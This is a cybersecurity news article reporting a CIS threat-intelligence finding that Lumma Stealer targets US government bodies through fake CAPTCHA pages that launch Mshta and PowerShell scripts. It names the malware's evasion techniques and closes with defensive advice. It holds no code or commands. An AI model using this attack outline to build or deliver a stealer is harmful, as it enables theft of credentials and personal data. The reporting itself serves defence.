Lumma Stealer Targets US Government: Fake CAPTCHA Attack Explained
22nd March 2025, Kathmandu
The Center for Internet Security (CIS) Cyber Threat Intelligence (CTI) team has identified a surge in Lumma Stealer malware activity targeting U.S. State, Local, Tribal, and Territorial (SLTT) government organizations.
Lumma Stealer Targets US Government
The malware campaign employs deceptive tactics, including fake CAPTCHA verification prompts, to trick users into executing malicious PowerShell scripts, ultimately delivering the Lumma Stealer payload.
How the Attack Works
CIS analysts detected the campaign through CIS Endpoint Security Services (ESS), observing multiple instances where SLTT victims were redirected to malicious web pages. These pages displayed fake CAPTCHA verification prompts designed to lure users into running a PowerShell script. The malicious activity was flagged by CIS ESS due to the use of Mshta, a Windows utility that executes Microsoft HTML Application (HTA) files, to run malicious JavaScript and initiate the PowerShell script.
Once executed, the initial PowerShell script downloads and runs two additional scripts. A third PowerShell script, containing defense evasion techniques and encrypted Windows binary code, is then compiled on the infected system into the .NET Lumma Stealer payload.
Lumma Stealer: A Growing Threat
Lumma Stealer is an information-stealing malware written in C that first emerged on dark web forums in 2022. It is sold as a Malware-as-a-Service (MaaS) subscription by the cyber threat actor known as “Shamel” or “Lumma.” The malware is designed to steal sensitive data, including personally identifiable information (PII), credentials, and banking information.
Lumma Stealer offers various defense evasion capabilities depending on the subscription tier purchased by threat actors. These include:
Detecting virtualized environments
Monitoring user activity on the system
Encrypting its executable to deter reverse engineering
Bypassing signature detection
Utilizing polyglot files (files that are valid in multiple formats)
The malware also employs Living off the Land (LotL) techniques, such as:
DLL sideloading
Mshta
PowerShell
Process hollowing
SSH
WMI (Windows Management Instrumentation)
CIS Recommendations
The CIS CTI team urges U.S. SLTT government entities to remain vigilant against Lumma Stealer and similar information-stealing campaigns. These threats are widespread, opportunistic, and highly effective at targeting sensitive data. Organizations are advised to:
Educate users about the risks of fake CAPTCHA prompts and suspicious web pages.
Monitor for unusual PowerShell activity and Mshta executions.
Implement robust endpoint security solutions, such as CIS ESS, to detect and block malicious scripts.
Regularly update and patch systems to mitigate vulnerabilities.
Background on Lumma Stealer
Lumma Stealer has gained notoriety for its ability to evade detection and steal critical data. Its MaaS model allows even less technically skilled threat actors to deploy the malware, increasing its prevalence. The malware’s use of LotL techniques makes it particularly challenging to detect, as it leverages legitimate system tools to carry out malicious activities.
As cybercriminals continue to refine their tactics, the need for proactive defense measures and heightened awareness among SLTT organizations has never been greater.
For more: Lumma Stealer Targets US Government
